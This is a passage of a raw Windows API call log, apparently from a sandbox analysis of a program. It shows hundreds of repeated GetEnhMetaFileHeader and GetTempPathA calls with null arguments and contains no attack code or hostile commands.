lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.618] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | 
out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: 
